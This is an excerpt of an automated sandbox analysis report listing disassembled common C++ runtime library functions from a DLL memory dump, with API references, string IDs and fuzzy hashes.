Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: `m,n
API String ID: 651022567-3377878941
Opcode ID: b8176df5bdaca437d0319d6bb8f3d0561bc381a7c0f6f2cafa9f5a949311f6f6
Instruction ID: 70e9a397f8daf559b16a6cef501db3e2e9ae6d66d710fdfc6a7615a233d05766
Opcode Fuzzy Hash: b8176df5bdaca437d0319d6bb8f3d0561bc381a7c0f6f2cafa9f5a949311f6f6
Instruction Fuzzy Hash: CE11067590052DCBCF00EBE0CC94AEEB77BBF45714F240908E4106B2D0DBB49A44C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 6E21BB30, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E21BB37
std::_Lockit::_Lockit.LIBCPMT ref: 6E21BB41
int.LIBCPMT ref: 6E21BB58

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

std::_Facet_Register.LIBCPMT ref: 6E21BB92
std::_Lockit::~_Lockit.LIBCPMT ref: 6E21BBB2
__CxxThrowException@8.LIBVCRUNTIME ref: 6E21BBD0

Strings

n,n, xrefs: 6E21BB4C

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: n,n
API String ID: 651022567-1342484985
Opcode ID: 3fbef3bfdbbb79f7d8789ad5d990f5b111c051b872b6de22f359d1a50de2a0ca
Instruction ID: 5837456fd597e2c1d6db6faa0fd0dad6903885155175de41ff1d125d22556f3b
Opcode Fuzzy Hash: 3fbef3bfdbbb79f7d8789ad5d990f5b111c051b872b6de22f359d1a50de2a0ca
Instruction Fuzzy Hash: E7110E79A0051ECBCF00EBE0C894AEDB7BBAF44B14F100919E511AB3D0DBB49B40C791

Uniqueness

Uniqueness Score: -1.00%

Function 6E21BBD6, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E21BBDD
std::_Lockit::_Lockit.LIBCPMT ref: 6E21BBE7
int.LIBCPMT ref: 6E21BBFE

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

std::_Facet_Register.LIBCPMT ref: 6E21BC38
std::_Lockit::~_Lockit.LIBCPMT ref: 6E21BC58
__CxxThrowException@8.LIBVCRUNTIME ref: 6E21BC76

Strings

$n,n, xrefs: 6E21BBF2

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: $n,n
API String ID: 651022567-3748013742
Opcode ID: f2667d9cebe87ca965cd52e37b60528922298404a2dc1f437f81022640f2288e
Instruction ID: a6547bb170d677b3cbd03c7a0d613a1b2f3d707285ca525e638e82ef695a7e22
Opcode Fuzzy Hash: f2667d9cebe87ca965cd52e37b60528922298404a2dc1f437f81022640f2288e
Instruction Fuzzy Hash: E2110E79A0052ECFCB00DBE4C898AEDB7BBAF84B04F140909E110AB390DFB49A40C791

Uniqueness

Uniqueness Score: -1.00%

Function 6E20F8A5, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E20F8AC
std::_Lockit::_Lockit.LIBCPMT ref: 6E20F8B6
int.LIBCPMT ref: 6E20F8CD

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

std::_Facet_Register.LIBCPMT ref: 6E20F907
std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F927
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20F945

Strings

dm,n, xrefs: 6E20F8C1

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: dm,n
API String ID: 651022567-1177862346
Opcode ID: c62049bfba2d9931af0c89e5a49a84c2050b416cba52b783378c154e42e0e512
Instruction ID: 7963a4779e0788762ceaea4ba09daf98973acaec55f14d88ed6e43071da81ed1
Opcode Fuzzy Hash: c62049bfba2d9931af0c89e5a49a84c2050b416cba52b783378c154e42e0e512
Instruction Fuzzy Hash: 2611E37590051E9BCF00DBE4C894AFEB7BBBF84718F240908E410AB2D0DBB49A45C791

Uniqueness

Uniqueness Score: -1.00%

Function 6E20F4C1, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E20F4C8
std::_Lockit::_Lockit.LIBCPMT ref: 6E20F4D2
int.LIBCPMT ref: 6E20F4E9

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

std::_Facet_Register.LIBCPMT ref: 6E20F523
std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F543
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20F561

Strings

tm,n, xrefs: 6E20F4DD

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: tm,n
API String ID: 651022567-372086613
Opcode ID: 1951ed48773d5ff228fac4f0635718d98ab2077ab9a3fa9f3a9494e45eddadb4
Instruction ID: 3d7b4184a9cf290e8d376da37961dc493cf19a053d9752398efd262e1cf1dcd8
Opcode Fuzzy Hash: 1951ed48773d5ff228fac4f0635718d98ab2077ab9a3fa9f3a9494e45eddadb4
Instruction Fuzzy Hash: 9411C67991091E9BCF01DBE4CC94AEEB77BBF44B18F240908E5106B2D0EFB4AA44C791

Uniqueness

Uniqueness Score: -1.00%

Function 6E20F375, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E20F37C
std::_Lockit::_Lockit.LIBCPMT ref: 6E20F386
int.LIBCPMT ref: 6E20F39D

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

std::_Facet_Register.LIBCPMT ref: 6E20F3D7
std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F3F7
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20F415

Strings

pm,n, xrefs: 6E20F391

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: pm,n
API String ID: 651022567-2572091394
Opcode ID: 8a30b9bb76ec5eaa5a37e6aec8e79c23ec760855f3273b040763a584d205b40d
Instruction ID: 4d7e936a3ed2f7f129a1bd50156fb673837000677847a2d41008beb10c35c4f9
Opcode Fuzzy Hash: 8a30b9bb76ec5eaa5a37e6aec8e79c23ec760855f3273b040763a584d205b40d
Instruction Fuzzy Hash: 1811E37590051E8FCF00DBE0C894AEEB77BAF84718F240909E510AB2D0DFB49A45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E22735D, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

UnDecorator::UScore.LIBVCRUNTIME ref: 6E227365
DName::DName.LIBVCRUNTIME ref: 6E22736F

Part of subcall function 6E225A6C: DName::doPchar.LIBVCRUNTIME ref: 6E225A93

DName::operator+=.LIBVCRUNTIME ref: 6E2273B8
DName::operator+=.LIBCMT ref: 6E2273C7
DName::operator+=.LIBCMT ref: 6E2273D3
DName::operator+=.LIBCMT ref: 6E2273E0

Strings

void, xrefs: 6E2273BF

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: Name::operator+=$Decorator::NameName::Name::doPcharScore
String ID: void
API String ID: 1092095640-3531332078
Opcode ID: c8a73d171bb76357443661164a13ea16987a8bbd2f5d7f14bb2b591226f0a5b3
Instruction ID: 16cc9319238a68ac39c54c6150795e32d24dcece4c89620ef7e106bd7ad328bf
Opcode Fuzzy Hash: c8a73d171bb76357443661164a13ea16987a8bbd2f5d7f14bb2b591226f0a5b3
Instruction Fuzzy Hash: EE11A13585420D9FDB04DFE4C8A5FECBBBABB01709F0084A8F8019B2D5DBB0AA45CB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E252C2B, Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,?,?,?,?,?,?,?,?,6E2533A0,?,?,00000000,?,?,?), ref: 6E252C6D
__fassign.LIBCMT ref: 6E252CE8
__fassign.LIBCMT ref: 6E252D03
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,00000005,00000000,00000000), ref: 6E252D29
WriteFile.KERNEL32(?,00000000,00000000,6E2533A0,00000000,?,?,?,?,?,?,?,?,?,6E2533A0,?), ref: 6E252D48
WriteFile.KERNEL32(?,?,00000001,6E2533A0,00000000,?,?,?,?,?,?,?,?,?,6E2533A0,?), ref: 6E252D81

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 16dbb80d325d00d4ea424f02295bf5976511163efa669ab6d703e8c571998704
Instruction ID: d6a1b6dbef85d15a2449a7ad8e6a947c604b614d6ee9e06ed70c267ba889a7c5
Opcode Fuzzy Hash: 16dbb80d325d00d4ea424f02295bf5976511163efa669ab6d703e8c571998704
Instruction Fuzzy Hash: A451A4B290064A9FDB00CFA8C985AEEBBFAEF0A300F15455AE955F7381D730D951CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E223F60, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 6E223F8B
___except_validate_context_record.LIBVCRUNTIME ref: 6E223F93
_ValidateLocalCookies.LIBCMT ref: 6E224021
__IsNonwritableInCurrentImage.LIBCMT ref: 6E22404C
_ValidateLocalCookies.LIBCMT ref: 6E2240A1

Strings

csm, xrefs: 6E224036

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 4036118a72cd09b98fd7ab41bcf03e77bdc2c174d201152525f5a170ef0b750f
Instruction ID: d5a374a0051502dc650a2e16d71fb59f373354c9ded5dce8767f4bfa821dc166
Opcode Fuzzy Hash: 4036118a72cd09b98fd7ab41bcf03e77bdc2c174d201152525f5a170ef0b750f
Instruction Fuzzy Hash: 3641B434A0020E9FCF04DFE9D844A9E7BB6BF45329F108565E8149B395D7B1DA42CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E25D29B, Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6E25CF81: _free.LIBCMT ref: 6E25CFAA

_free.LIBCMT ref: 6E25D2E9

Part of subcall function 6E24CBD3: HeapFree.KERNEL32(00000000,00000000,?,6E25CFAF,00000000,00000000,00000000,00000000,?,6E25D2B4,00000000,00000007,00000000,?,6E25C0FC,00000000), ref: 6E24CBE9
Part of subcall function 6E24CBD3: GetLastError.KERNEL32(00000000,?,6E25CFAF,00000000,00000000,00000000,00000000,?,6E25D2B4,00000000,00000007,00000000,?,6E25C0FC,00000000,00000000), ref: 6E24CBFB

_free.LIBCMT ref: 6E25D2F4
_free.LIBCMT ref: 6E25D2FF
_free.LIBCMT ref: 6E25D353
_free.LIBCMT ref: 6E25D35E
_free.LIBCMT ref: 6E25D369
_free.LIBCMT ref: 6E25D374

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 60696fea0fb7a8f1018e7d39f05bb92555332742b445cba9cf2dcfb68d68d62d
Instruction ID: 8fa4785d91d2f5e5975e706f67165941b4479354c1bb5b7543d275e210967cf9
Opcode Fuzzy Hash: 60696fea0fb7a8f1018e7d39f05bb92555332742b445cba9cf2dcfb68d68d62d
Instruction Fuzzy Hash: 4D118175944B0CFBE520A7F0CD07FCBB7AE9F00B14F508D16E29AAE251EB39B5144650

Uniqueness

Uniqueness Score: -1.00%

Function 6E20EF91, Relevance: 10.6, APIs: 7, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E20EF98
std::_Lockit::_Lockit.LIBCPMT ref: 6E20EFA2
int.LIBCPMT ref: 6E20EFB9

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

collate.LIBCPMT ref: 6E20EFDC
std::_Facet_Register.LIBCPMT ref: 6E20EFF3
std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F013
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20F031

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcollate
String ID:
API String ID: 2363045490-0
Opcode ID: 9d4ec4f87350eb97de8be75f7767e3c165ab8d60c3e96bdd77b880eb4a02d8c0
Instruction ID: 5c9b8f76120b1df9aeff51c5084e6e907daec447d121e33e8a8055deb2c3d2f3
Opcode Fuzzy Hash: 9d4ec4f87350eb97de8be75f7767e3c165ab8d60c3e96bdd77b880eb4a02d8c0
Instruction Fuzzy Hash: BA11E37591051D8BCF00DBE0C894AEEB77BAF44715F140909E510AB2D0DFB4AA40C791

Uniqueness

Uniqueness Score: -1.00%

Function 6E21BA8A, Relevance: 10.6, APIs: 7, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E21BA91
std::_Lockit::_Lockit.LIBCPMT ref: 6E21BA9B
int.LIBCPMT ref: 6E21BAB2

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

moneypunct.LIBCPMT ref: 6E21BAD5
std::_Facet_Register.LIBCPMT ref: 6E21BAEC
std::_Lockit::~_Lockit.LIBCPMT ref: 6E21BB0C
__CxxThrowException@8.LIBVCRUNTIME ref: 6E21BB2A

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID:
API String ID: 113178234-0
Opcode ID: bce9ecf732a7b4b5fc076547dad1aecc5c1a3bf6f81be0d14a4e478a59f42148
Instruction ID: 734de158d0fa54177c58d4227b11f51af845ccd0e6bbc089bfe5059c94ce5df3
Opcode Fuzzy Hash: bce9ecf732a7b4b5fc076547dad1aecc5c1a3bf6f81be0d14a4e478a59f42148
Instruction Fuzzy Hash: 1911E37A90451ECBCF04DBE4C894AFDB7BBAF45B14F180919E5116B390DBB49A40C791

Uniqueness

Uniqueness Score: -1.00%

Function 6E21B9E4, Relevance: 10.6, APIs: 7, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E21B9EB
std::_Lockit::_Lockit.LIBCPMT ref: 6E21B9F5
int.LIBCPMT ref: 6E21BA0C

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

moneypunct.LIBCPMT ref: 6E21BA2F
std::_Facet_Register.LIBCPMT ref: 6E21BA46
std::_Lockit::~_Lockit.LIBCPMT ref: 6E21BA66
__CxxThrowException@8.LIBVCRUNTIME ref: 6E21BA84

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID:
API String ID: 113178234-0
Opcode ID: 384db94be18ed0e5724856dfb2a9809d3d77c266152c34c1e825148bb8edba5b
Instruction ID: c1249fca7f6cc80b9db5a7902068ea75e5d80f79faff2a3094615eaa3eb0b955
Opcode Fuzzy Hash: 384db94be18ed0e5724856dfb2a9809d3d77c266152c34c1e825148bb8edba5b
Instruction Fuzzy Hash: 33113279D0451ECBCF00DBE4C898AEDB7BBAF44B04F140919E510AB390CBB49B41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E20F9F1, Relevance: 10.6, APIs: 7, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E20F9F8
std::_Lockit::_Lockit.LIBCPMT ref: 6E20FA02
int.LIBCPMT ref: 6E20FA19

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

numpunct.LIBCPMT ref: 6E20FA3C
std::_Facet_Register.LIBCPMT ref: 6E20FA53
std::_Lockit::~_Lockit.LIBCPMT ref: 6E20FA73
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20FA91

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrownumpunct
String ID:
API String ID: 2509942033-0
Opcode ID: 5c127cc877e899947332e31e21906164a2b41964e81ce974a789dca12644fbfa
Instruction ID: 25cf433e70bb9b3bbb59fe7f14114457af90a7abe063d505dcdecc3cddb429a5
Opcode Fuzzy Hash: 5c127cc877e899947332e31e21906164a2b41964e81ce974a789dca12644fbfa
Instruction Fuzzy Hash: 6911E37990052E8BCF00DBE4CC94AEEB77BAF44B14F244908E4116B2D0DFB49A45C791

Uniqueness

Uniqueness Score: -1.00%

Function 6E20F60D, Relevance: 10.6, APIs: 7, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E20F614
std::_Lockit::_Lockit.LIBCPMT ref: 6E20F61E
int.LIBCPMT ref: 6E20F635

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

moneypunct.LIBCPMT ref: 6E20F658
std::_Facet_Register.LIBCPMT ref: 6E20F66F
std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F68F
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20F6AD

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID:
API String ID: 113178234-0
Opcode ID: cb6f4d7a64f764b0205d0bbe6a2a1405ced434aaf0f13f0228c205cd98ea7f70
Instruction ID: 9f029279f3dec20ff8cca31f8de851de466ce8a13851c521c966489a781f5d2a
Opcode Fuzzy Hash: cb6f4d7a64f764b0205d0bbe6a2a1405ced434aaf0f13f0228c205cd98ea7f70
Instruction Fuzzy Hash: 24110675D0051E8FCF04DBE0C894AEEB77BAF44B18F240918E420AB2D0DB749A45CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 6E21B74C, Relevance: 10.6, APIs: 7, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E21B753
std::_Lockit::_Lockit.LIBCPMT ref: 6E21B75D
int.LIBCPMT ref: 6E21B774

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

collate.LIBCPMT ref: 6E21B797
std::_Facet_Register.LIBCPMT ref: 6E21B7AE
std::_Lockit::~_Lockit.LIBCPMT ref: 6E21B7CE
__CxxThrowException@8.LIBVCRUNTIME ref: 6E21B7EC

